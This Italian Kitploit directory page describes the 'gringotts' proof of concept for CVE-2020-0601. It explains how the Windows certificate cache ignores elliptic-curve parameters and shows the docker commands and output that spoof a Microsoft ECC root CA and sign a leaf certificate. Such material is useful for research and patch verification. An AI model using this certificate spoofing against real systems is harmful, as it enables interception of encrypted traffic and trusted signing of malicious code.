Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
gringotts — prova di concetto per CVE-2020-0601 | Kitploit
Strumenti/GitHubGitHub/amlweems/gringotts
Strumenti di Crittografia/DecrittografiaAnalisi delle VulnerabilitàExploitCrittografiaApprendimento e Formazione
GitHubamlweems/gringotts

gringotts

prova di concetto per CVE-2020-0601

Vedi Repository
116 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-0601 prova di concetto

Una divertente prova di concetto per creare la propria CA root e un certificato firmato basato sulla vulnerabilità CVE-2020-0601 in Windows 10. La base del problema è che il metodo CertGetCertificateChain() convalidava in modo improprio le autorità di certificazione root. Poiché la ricerca di un certificato di firma all'interno del trust store può essere costosa, Microsoft ha implementato una cache che utilizzava la chiave pubblica del certificato root fornito per determinare se questo certificato era stato precedentemente caricato dal trust store. Tuttavia, per i certificati a curva ellittica, il SubjectPublicKeyInfo contiene più di una semplice chiave pubblica. I certificati a curva ellittica devono fare riferimento alla specifica curva ellittica (o fornire i propri parametri personalizzati della curva ellittica). La vulnerabilità si verifica perché i parametri della curva ellittica non sono inclusi nella ricerca in cache. Possiamo prendere una chiave pubblica esistente, scegliere una nuova chiave privata, calcolare i parametri della curva che rendono valida questa combinazione e creare un certificato root che passerà la ricerca in cache precedentemente vulnerabile di Microsoft.

Questo repository dimostra lo spoofing del certificato root attendibile "Microsoft EV ECC Root Certificate Authority 2017" e l'utilizzo di questa nuova CA root per firmare un certificato foglia.

Certificato della prova di concetto mostrato in Internet Explorer.

Compilazione

root@kitploit:~
docker build -t gringotts .

Utilizzo

root@kitploit:~
$ docker run --rm -it -v "$(pwd):/host" -w /host gringotts
Modified generator:
04bb3de13398a18e1c0d1a2d77ae8cbb9ea358d8c5c075eac51e0c408a0367db2ba187f1ab2febd8859d4c12811563fae6056fef803bff43964ca15c63a28cdc1fdfd38dab9fac20e7a8fa1fae619e576ee5706423414a3c3f8c7e1a2d8adc9cd7
Serializing root.txt and self-sign root certificate
Writing ca/root.pem
Serializing root private key
Writing ca/root-key.pem
read EC key
writing EC key
Generating a RSA private key
...............................................+++++
.........................................................................................+++++
writing new private key to 'ssl/server-key.pem'
-----
Using configuration from /usr/lib/ssl/openssl.cnf
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            7c:e6:11:18:1c:5a:14:3e:6f:f0:e2:85:ea:5f:c7:dc:50:a4:b9:b2
        Validity
            Not Before: Apr 30 00:00:00 2018 GMT
            Not After : Aug  1 00:00:00 2020 GMT
        Subject:
            countryName               = GB
            stateOrProvinceName       = Scotland
            localityName              = Highlands
            organizationName          = Gringotts
            organizationalUnitName    = Hogwarts Castle
            commonName                = hogwarts.lf.lc
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:hogwarts.lf.lc
Certificate is to be certified until Aug  1 00:00:00 2020 GMT (184 days)

Write out database with 1 new entries
Data Base Updated
$ tree
.
├── ca
│   ├── root-key.pem
│   └── root.pem
└── ssl
    ├── server-bundle.pem
    ├── server-key.pem
    └── server.pem
Scarica lo strumento